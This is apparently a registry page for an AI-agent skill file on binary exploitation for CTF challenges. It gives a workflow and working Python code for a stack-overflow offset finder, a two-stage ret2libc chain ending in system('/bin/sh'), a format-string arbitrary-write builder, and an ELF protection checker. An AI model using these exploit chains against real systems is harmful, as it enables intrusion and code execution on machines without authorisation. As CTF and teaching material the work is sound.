xuziqiang98

pwn-exploit

Comprehensive binary exploitation techniques covering stack overflow, format string, heap exploitation, integer overflow, and advanced exploitation methods. Use when working on CTF challenges, binary vulnerability analysis, exploit development, or debugging memory corruption vulnerabilities in Linux binaries (x86/x64).

Updated 4 months ago

Install

npx skillscat add xuziqiang98/my-skills/pwn-exploit

Install via the SkillsCat registry.

SKILL.md

Pwn Exploit

Overview

This skill provides structured access to binary exploitation techniques organized by vulnerability type. It serves as a reference guide for developing exploits, understanding attack vectors, and navigating CTF-Wiki documentation.

Quick Start

Identify the vulnerability type in your target binary, then open the corresponding reference file from the table under References.

Exploitation Workflow

1. Vulnerability Analysis

Use static/dynamic analysis tools to identify:

  • Memory corruption vulnerabilities
  • Unsafe function calls
  • Missing input validation
  • Protection mechanisms (ASLR, NX, PIE, stack canary, RELRO)

2. Technique Selection

Choose exploitation technique based on:

  • Vulnerability type (stack overflow, heap overflow, format string, etc.)
  • Available building blocks (ROP gadgets, libc functions for ret2libc, a syscall gadget for raw system calls)
  • Mitigations present (bypass NX with ROP, bypass ASLR with leaks)
  • Constraints (limited buffer size, character restrictions)

3. Exploit Development

Follow reference documentation for specific technique:

  • Understand the underlying mechanism
  • Identify required primitives (read, write, execute)
  • Build payload step by step
  • Test and iterate
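The steps above end with "build payload step by step" and "test and iterate", and for a stack overflow the first iteration is almost always measuring the distance from the buffer to the saved return address. The example below is added here and is not part of this skill or of pwntools: it reimplements in plain Python the cyclic pattern that pwntools' cyclic()/cyclic_find() provide, recovers the offset from a constructed crash value, and builds the overflow payload. The crash value, the 0x401136 target address and the i386 variant are assumptions for illustration.

```python
import struct

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"


def de_bruijn(alphabet=ALPHABET, n=4):
    """Yield the de Bruijn sequence B(k, n) over `alphabet` (FKM algorithm).
    Every n-byte window occurs exactly once, so n bytes pulled from a crashed
    register identify their position in the pattern unambiguously."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic(length, n=4):
    """First `length` bytes of the pattern (same layout pwntools' cyclic() produces)."""
    out = bytearray()
    for b in de_bruijn(ALPHABET, n):
        if len(out) == length:
            break
        out.append(b)
    return bytes(out)


def cyclic_find(value, n=4, search_len=0x10000):
    """Offset of the n-byte window `value` within the pattern, or -1.
    `value` may be raw bytes or the integer read from a register. On i386 that
    is EIP; on amd64 a `ret` to a non-canonical address faults before RIP is
    updated, so read the 8 bytes at RSP instead."""
    if isinstance(value, int):
        value = value.to_bytes(8, "little")
    return cyclic(search_len, n).find(value[:n])


def overflow_payload(offset, target, arch="amd64"):
    """Padding up to the saved return address, then `target` packed for `arch`."""
    fmt = "<Q" if arch == "amd64" else "<I"
    return b"A" * offset + struct.pack(fmt, target)


if __name__ == "__main__":
    # Constructed scenario, not a real crash: the target was fed cyclic(200)
    # and gdb showed the qword at $rsp as 0x6161616b6161616a when `ret` faulted.
    offset = cyclic_find(0x6161616b6161616a)  # 36
    # 0x401136 stands in for a hypothetical win function or first ROP gadget.
    print(offset, overflow_payload(offset, 0x401136).hex())
```

Send cyclic(N) with N comfortably larger than the buffer, read the faulting value from the debugger, and feed it to cyclic_find; if it returns -1 the crash did not come from the return address (check RBP, or whether the input was truncated by a NUL or newline).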

Common Exploit Primitives

Information Leak

  • Libc leak: call puts, printf, or write on a resolved GOT entry (or read a libc pointer left on the stack or heap), then subtract the symbol's offset to get the libc base
  • Binary leak: recover the PIE base from a code pointer (saved return address, function pointer, or an unresolved GOT entry that still points into the PLT); a resolved GOT entry leaks libc, not the binary
  • Stack leak: leak the canary or a stack address (e.g. with a format string, or by printing a buffer that was filled right up to the canary with no terminating NUL)

Control Flow Hijack

  • Ret2libc: return into libc functions (system, execve) with the arguments placed in registers (x86-64) or on the stack (i386)
  • ROP: chain gadgets into an arbitrary computation, typically ending in a syscall such as execve
  • Partial overwrites: with only one or two controlled bytes, redirect a GOT entry or a libc hook (e.g. __free_hook, present up to glibc 2.33) to a nearby function without needing a full leak
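The leak and hijack primitives listed above are normally combined into one two-stage ret2libc exploit: overflow once to print a GOT entry and return to main, compute the libc base, then overflow again to call system("/bin/sh"). The example below is an added illustration, not code from this skill; the libc offsets, PLT/GOT addresses, gadget addresses and the leaked line are constructed for a hypothetical non-PIE x86-64 target, and the comments say where the real values come from.

```python
import struct


def p64(x):
    return struct.pack("<Q", x)


def u64(b):
    # puts() stops at the first NUL, so a leaked user-space pointer arrives as
    # its 6 significant bytes; right-pad to 8 before unpacking.
    return struct.unpack("<Q", b.ljust(8, b"\0"))[0]


# Constructed offsets for a hypothetical libc build (real ones: `readelf -s
# libc.so.6` for symbols, `strings -t x libc.so.6 | grep /bin/sh` for the string).
LIBC = {"puts": 0x80E50, "system": 0x50D70, "/bin/sh": 0x1D8678}

# Constructed addresses for a hypothetical non-PIE target (real ones:
# `ROPgadget --binary ./target` for gadgets, `objdump -d` for PLT/GOT/main).
BIN = {"pop_rdi": 0x401353, "ret": 0x40101A, "puts@plt": 0x401030,
       "puts@got": 0x404018, "main": 0x401136}


def leak_chain(offset, b=BIN):
    """Stage 1: puts(puts@got) prints puts' libc address, then return to main
    so the program reads input again and a second overflow can use the leak."""
    return (b"A" * offset + p64(b["pop_rdi"]) + p64(b["puts@got"])
            + p64(b["puts@plt"]) + p64(b["main"]))


def libc_base_from_leak(line, libc=LIBC):
    """Turn the line puts printed (pointer bytes + '\\n') into the libc base."""
    base = u64(line.rstrip(b"\n")[:8]) - libc["puts"]
    if base & 0xFFF:
        raise ValueError("base %#x not page aligned: wrong offset or bad leak" % base)
    return base


def system_chain(offset, base, b=BIN, libc=LIBC):
    """Stage 2: system("/bin/sh"). The leading `ret` realigns RSP to 16 bytes
    before the call; without it system() can fault on a movaps instruction."""
    return (b"A" * offset + p64(b["ret"]) + p64(b["pop_rdi"])
            + p64(base + libc["/bin/sh"]) + p64(base + libc["system"]))


if __name__ == "__main__":
    # Offline walk-through with a constructed leak line (what the target would print).
    base = libc_base_from_leak(b"\x50\x0e\x88\x0f\x5e\x7f\n")
    print(hex(base), system_chain(40, base).hex())
    # Against a live target with pwntools the two stages look like:
    #   io.sendline(leak_chain(40)); base = libc_base_from_leak(io.recvline())
    #   io.sendline(system_chain(40, base)); io.interactive()
```

The page-alignment check catches the two most common mistakes at this step, a libc version mismatch and reading the leak from the wrong line; a base that is not a multiple of 0x1000 can never be right.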

Memory Write

  • Arbitrary write: tcache poisoning or fastbin dup to make malloc return a chosen address, or a format string %n write; an unsorted bin attack only writes a libc pointer (not a chosen value) to a chosen address
  • Pointer hijacking: overwrite function pointers or vtable pointers that the program later calls through
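For the format string route to an arbitrary write, the payload has to be laid out so that each %hn refers to an address carried in the same buffer, and the index digits change the buffer length, which is easy to get wrong by hand. The builder plus offline checker below is an added example, not part of this skill and not pwntools' fmtstr_payload; it assumes an x86-64 target with 8-byte stack slots and an attacker-controlled format whose argument index was found experimentally. The GOT address 0x404018 and the values written are constructed.

```python
import re
import struct


def p64(x):
    return struct.pack("<Q", x)


def fmtstr_write(addr, value, offset, nbytes=8, written=0):
    """Format-string payload storing `value` (little-endian, `nbytes` wide) at
    `addr` with 2-byte %hn writes. `offset` is the 1-based printf argument
    index at which the payload buffer itself sits on the stack (probe with
    b"AAAAAAAA%6$p", b"...%7$p", ... until 0x4141414141414141 shows up).
    `written` is how much printf has already output before the payload, e.g.
    a fixed prefix in the format. Only positional conversions are used, so no
    argument is consumed implicitly."""
    assert nbytes % 2 == 0, "writes are 16 bits each"
    chunks = sorted(((value >> (16 * i)) & 0xFFFF, addr + 2 * i) for i in range(nbytes // 2))
    # Ascending order keeps every %c width small and the running count monotone.
    first = offset  # argument index of the first address; refined until stable
    for _ in range(8):
        spec, count = b"", written
        for i, (val, _) in enumerate(chunks):
            width = (val - count) % 0x10000  # chars to print so count & 0xffff == val
            if width:
                spec += b"%%%d$%dc" % (first + i, width)
            spec += b"%%%d$hn" % (first + i)
            count += width
        spec += b"A" * (-len(spec) % 8)  # qword-align the address block
        if first == offset + len(spec) // 8:
            break
        first = offset + len(spec) // 8
    else:
        raise ValueError("address layout did not converge")
    assert b"\0" not in spec, "a NUL in the specifier part would truncate the format"
    # Addresses go last: their NUL bytes end the format string after all stores.
    return spec + b"".join(p64(a) for _, a in chunks)


SPEC = re.compile(rb"%(\d+)\$(\d*)(c|hn)")


def simulate_printf(payload, offset, written=0):
    """Model glibc's byte counting for the conversions used above and return
    the 16-bit stores {address: value} the %hn conversions would perform, so a
    payload can be checked offline before it is sent to a target."""
    def arg(idx):
        return struct.unpack_from("<Q", payload, (idx - offset) * 8)[0]

    fmt = payload.split(b"\0", 1)[0]  # printf stops at the first NUL
    count, pos, stores = written, 0, {}
    for m in SPEC.finditer(fmt):
        count += m.start() - pos  # literal bytes are printed verbatim
        idx, width, conv = int(m.group(1)), m.group(2), m.group(3)
        if conv == b"c":
            count += max(int(width or b"1"), 1)
        else:
            stores[arg(idx)] = count & 0xFFFF
        pos = m.end()
    return stores


def stored_value(stores, addr, nbytes=8):
    return sum(stores[addr + 2 * i] << (16 * i) for i in range(nbytes // 2))


if __name__ == "__main__":
    # Constructed target: overwrite the GOT slot at 0x404018 with 0x401136.
    payload = fmtstr_write(0x404018, 0x401136, offset=6)
    print(payload)
    print(hex(stored_value(simulate_printf(payload, 6), 0x404018)))
```

Two-byte writes keep each %c width below 65536, so the whole payload prints at most a few hundred kilobytes; byte-wise %hhn halves that but doubles the number of addresses, and one-shot 4-byte %n writes are only practical when the value is small.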

Tool Integration

Common tools for exploitation development:

  • pwntools: Python framework for exploit development
  • ROPgadget: Find ROP gadgets in binaries
  • one_gadget: find addresses in libc that call execve("/bin/sh", ...) outright, each valid only when its listed register/stack constraints hold at the time of the jump
  • checksec: Analyze binary protections
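Both step 1 of the workflow (identifying protection mechanisms) and the checksec entry above come down to a few ELF header fields. The parser below is an added example, not part of this skill and not the checksec tool: it reads NX from PT_GNU_STACK, PIE from e_type, RELRO from PT_GNU_RELRO plus the BIND_NOW dynamic flags, and the canary from whether __stack_chk_fail is imported, which is the same heuristic checksec.sh applies. The build_sample_elf helper fabricates a minimal ELF image so the code runs offline; it is not a real binary.

```python
import struct
import sys

PT_LOAD, PT_DYNAMIC = 1, 2
PT_GNU_STACK, PT_GNU_RELRO = 0x6474E551, 0x6474E552
PF_X = 1
ET_EXEC, ET_DYN = 2, 3
DT_NULL, DT_STRTAB, DT_STRSZ, DT_BIND_NOW, DT_FLAGS, DT_FLAGS_1 = 0, 5, 10, 24, 30, 0x6FFFFFFB
DF_BIND_NOW, DF_1_NOW = 0x8, 0x1
EHDR, PHDR, DYN = "<16sHHIQQQIHHHHHH", "<IIQQQQQQ", "<qQ"  # Elf64_Ehdr / Phdr / Dyn


def checksec(elf: bytes) -> dict:
    """Report NX, PIE, RELRO and canary for a little-endian ELF64 image using
    only the ELF header, program headers and dynamic segment, so it also
    works on stripped binaries whose section headers were removed."""
    if elf[:5] != b"\x7fELF\x02" or elf[5] != 1:
        raise ValueError("expected a little-endian ELF64 image")
    hdr = struct.unpack_from(EHDR, elf, 0)
    e_type, phoff, phentsize, phnum = hdr[1], hdr[5], hdr[9], hdr[10]
    phdrs = [struct.unpack_from(PHDR, elf, phoff + i * phentsize) for i in range(phnum)]

    def file_offset(vaddr):  # map a virtual address to a file offset via PT_LOAD
        for p_type, _flags, off, va, _pa, filesz, *_ in phdrs:
            if p_type == PT_LOAD and va <= vaddr < va + filesz:
                return off + (vaddr - va)
        raise ValueError("vaddr %#x is not file-backed" % vaddr)

    # No PT_GNU_STACK at all is reported as NX off, matching checksec.sh.
    result = {"nx": False, "pie": e_type == ET_DYN, "relro": "none", "canary": False}
    dynamic = {}
    for p_type, flags, off, _va, _pa, filesz, *_ in phdrs:
        if p_type == PT_GNU_STACK:
            result["nx"] = not (flags & PF_X)
        elif p_type == PT_GNU_RELRO:
            result["relro"] = "partial"  # upgraded to "full" below if BIND_NOW is set
        elif p_type == PT_DYNAMIC:
            for i in range(filesz // 16):
                tag, val = struct.unpack_from(DYN, elf, off + i * 16)
                if tag == DT_NULL:
                    break
                dynamic[tag] = val
    bind_now = (DT_BIND_NOW in dynamic or dynamic.get(DT_FLAGS, 0) & DF_BIND_NOW
                or dynamic.get(DT_FLAGS_1, 0) & DF_1_NOW)
    if result["relro"] == "partial" and bind_now:
        result["relro"] = "full"  # GOT is read-only once the loader finishes
    if DT_STRTAB in dynamic and DT_STRSZ in dynamic:
        start = file_offset(dynamic[DT_STRTAB])
        dynstr = elf[start:start + dynamic[DT_STRSZ]]
        # __stack_chk_fail is imported only if the compiler emitted canary checks.
        result["canary"] = b"__stack_chk_fail\0" in dynstr
    return result


def build_sample_elf(pie=True, nx=True, relro="full", canary=True) -> bytes:
    """Constructed test image, not a real binary: ELF64 header, four program
    headers, a dynamic segment and a .dynstr blob inside a single PT_LOAD."""
    dynstr = b"\0libc.so.6\0" + (b"__stack_chk_fail\0" if canary else b"") + b"puts\0"
    phnum = 4
    dyn_off = 64 + 56 * phnum
    entries = [(DT_STRSZ, len(dynstr))] + ([(DT_FLAGS, DF_BIND_NOW)] if relro == "full" else [])
    str_off = dyn_off + 16 * (len(entries) + 2)  # + DT_STRTAB + DT_NULL
    entries = [(DT_STRTAB, str_off)] + entries + [(DT_NULL, 0)]
    dynamic = b"".join(struct.pack(DYN, *e) for e in entries)
    total = str_off + len(dynstr)

    def ph(p_type, flags, off, size):  # vaddr == file offset keeps the sample simple
        return struct.pack(PHDR, p_type, flags, off, off, off, size, size, 8)

    phdrs = [ph(PT_LOAD, 5, 0, total),
             ph(PT_DYNAMIC, 6, dyn_off, len(dynamic)),
             ph(PT_GNU_STACK, 6 if nx else 7, 0, 0),
             ph(PT_GNU_RELRO, 4, dyn_off, len(dynamic)) if relro != "none" else ph(0, 0, 0, 0)]
    ident = b"\x7fELF\x02\x01\x01" + b"\0" * 9
    ehdr = struct.pack(EHDR, ident, ET_DYN if pie else ET_EXEC, 0x3E, 1, 0x1000,
                       64, 0, 0, 64, 56, phnum, 64, 0, 0)
    return ehdr + b"".join(phdrs) + dynamic + dynstr


if __name__ == "__main__":
    path = sys.argv[1] if len(sys.argv) > 1 else None
    image = open(path, "rb").read() if path else build_sample_elf()
    print(checksec(image))
```

Run it on a real target with `python3 checksec_min.py ./target` (file name assumed). ASLR is a property of the kernel (/proc/sys/kernel/randomize_va_space), not the binary, which is why it is absent here; the canary result is a heuristic, since a binary can import __stack_chk_fail while the vulnerable function itself was compiled without a canary.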

References

Detailed technique documentation is organized by category:

Category            Reference file
Stack Overflow      stack-overflow.md
Format String       format-string.md
Heap Exploitation   heap-exploitation.md
Integer Overflow    integer-overflow.md

When to Use This Skill

Use this skill when:

  • Analyzing CTF challenges involving pwn vulnerabilities
  • Developing binary exploits for Linux targets
  • Learning exploitation techniques and understanding attack vectors
  • Debugging memory corruption in vulnerable programs
  • Bypassing security mitigations (ASLR, NX, PIE, stack canary)